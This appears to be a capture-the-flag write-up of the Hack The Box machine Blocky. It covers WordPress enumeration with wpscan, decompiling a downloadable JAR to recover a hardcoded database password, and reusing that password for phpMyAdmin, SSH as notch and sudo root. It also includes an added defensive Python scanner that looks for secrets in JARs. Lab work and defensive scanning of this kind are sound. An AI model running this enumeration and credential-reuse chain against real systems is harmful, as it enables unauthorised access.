Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04 Xenial. There’s also something interesting going on with TCP 25565, as it’s reporting closed.
I find the site runs WordPress (the footer says "proudly powered by WordPress") and the server also hosts a wiki. Checking the post, I find the user account name notch and the login page.
The default login admin:admin does not work.
wpscan finds no plugins, but it does identify the notch user I noted earlier on the site.
┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# wpscan --url http://10.10.10.37 -e ap,t,tt,u
WordPress Security Scanner by the WPScan Team
Version 3.8.19
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Sun Nov 21 03:10:43 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - (400 / 400) 100.00% Time: 00:02:32
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8'
[+] twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3'
[+] twentysixteen
| Location: http://10.10.10.37/wp-content/themes/twentysixteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - (2575 / 2575) 100.00% Time: 00:04:42
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 03:18:20 2021
[+] Requests Done: 3050
[+] Cached Requests: 19
[+] Data Sent: 825.099 KB
[+] Data Received: 18.245 MB
[+] Memory used: 264.414 MB
[+] Elapsed time: 00:07:37
From that list, I'll check out /wiki, /plugins, and /phpmyadmin.
visit 10.10.10.37:80/wiki
visit 10.10.10.37:80/phpmyadmin
I find that the default login admin:admin does not work.
visit 10.10.10.37:80/plugins
I find two .jar files (BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar) and download them to my host machine.
A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension.
Shell as notch
Reverse Jars
I use JD-GUI to decompile the Java files. JD-GUI is a standalone graphical utility that displays the Java source code of ".class" files. You can browse the reconstructed source code with JD-GUI for instant access to methods and fields.
jd-gui:
How to install: sudo apt install jd-gui
More details: https://www.kali.org/tools/jd-gui/
After installation, I launch JD-GUI with the command "jd-gui". Then I open each jar file in turn. I find the root database login details in BlockyCore.class.
public class BlockyCore {
    // Database credentials compiled straight into the class as plain-text literals
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
}
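The finding above (database credentials compiled into a JAR that is served from a web-accessible directory) is something a defender can catch before a build ships. As an added example, not from the original post or from the Blocky box, here is a Python scanner that walks the constant pool of every .class inside a JAR and flags password-like identifiers and high-entropy string literals; sample_jar(), its class name and the credential literal in it are constructed for this example.

```python
import collections, io, math, re, struct, zipfile
# Payload size (bytes after the tag) of every non-Utf8 constant-pool tag (JVM spec 4.4).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
          12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(class_bytes):
    """Walk a .class constant pool and return every CONSTANT_Utf8 string in it."""
    if class_bytes[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", class_bytes[8:10])[0]  # constant_pool_count
    pos, idx, out = 10, 1, []
    while idx < count:
        tag, pos = class_bytes[pos], pos + 1
        if tag == 1:
            n = struct.unpack(">H", class_bytes[pos:pos + 2])[0]
            out.append(class_bytes[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        else:
            pos += _FIXED[tag]
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two pool slots
    return out

def shannon_entropy(s):
    return -sum(c / len(s) * math.log2(c / len(s)) for c in collections.Counter(s).values())

def find_secret_candidates(jar_bytes, min_len=16, min_entropy=3.5):
    """Flag password-like identifiers and high-entropy string literals in every class of a JAR."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in (n for n in jar.namelist() if n.endswith(".class")):
            for c in utf8_constants(jar.read(name)):
                if re.fullmatch(r"\w+", c) and re.search(r"(?i)pass|secret|token|pwd", c):
                    hits.append((name, "field", c))
                elif (len(c) >= min_len and not re.search(r"[\s/();<>]", c)  # skips descriptors
                      and shannon_entropy(c) >= min_entropy):
                    hits.append((name, "literal", c))
    return hits

def _class_with_pool(entries):  # constructed input: header plus constant pool only
    pool = b"".join(b"\x01" + struct.pack(">H", len(e.encode())) + e.encode() if isinstance(e, str)
                    else bytes([e[0]]) + e[1] for e in entries)  # str -> Utf8, (tag, payload) -> other
    return b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(entries) + 1) + pool

def sample_jar():  # one-class JAR constructed for this example; the credential literal is made up
    entries = ["BlockyCore", "sqlHost", "localhost", "sqlUser", "root", "sqlPass",
               "x7Qz9LmP2vRt4Ky8Bn3Wc5Jh", (8, b"\x00\x07"), (3, b"\x00\x00\x0b\xb8")]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("BlockyCore.class", _class_with_pool(entries))
    return buf.getvalue()
```

The entropy threshold is a heuristic: it catches random-looking passwords and API keys but will miss dictionary-word secrets, so it complements rather than replaces a review of how the build obtains its configuration.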
I try to log in to phpMyAdmin with root:8YsqfCTnvxAUeduzjNSXe22, and the login succeeds.
I check wp_users and find the user notch's information as follows.
SELECT * FROM `wp_users`
I use "hash-identifier" to identify the possible type of the hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/". Hash-identifier is a tool that identifies the different types of hashes used to protect data, especially passwords. More information: https://www.kali.org/tools/hash-identifier/
How to install:
apt install hash-identifier
I launch hash-identifier with the following command:
hash-identifier
It tells me the hash is most likely an MD5 (WordPress) hash.
Exploitation (SSH - Port 22)
I use SSH to log in as root or notch.
The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).
More details : https://www.ssh.com/ssh/protocol/
I have two user accounts (notch and root) and one password, 8YsqfCTnvxAUeduzjNSXe22. I use ssh to log in as notch with the command:
sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37
or
ssh notch@10.10.10.37
User Notch
I log in as notch with ssh but get the error "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find a fix at https://www.tecmint.com/fix-no-route-to-host-ssh-error-in-linux/
I choose to use ufw and then get another error, "zsh: command not found: ufw". I have to install the ufw tool; the installation command is "apt install -y ufw". Details: https://www.hiroom2.com/2017/07/20/kalilinux-2017-1-ufw-en
Login with tool SSHPASS
sshpass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password is indeed issued by an interactive keyboard user. Sshpass runs ssh in a dedicated tty, fooling it into thinking it is getting the password from an interactive user. More information link:
I use the commands "sudo -l" and "sudo su -" to get root access. The root password is the same as notch's.
Sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser.
More information link:https://en.wikipedia.org/wiki/Sudo
I can see that notch has unlimited sudo privileges and can run any command on the system. Then I get root with "sudo su -".
Thanks for reading. This is my 41st pwned machine in Hack The Box. I will try harder to go beyond OSCP, so that I can pass OSCP successfully.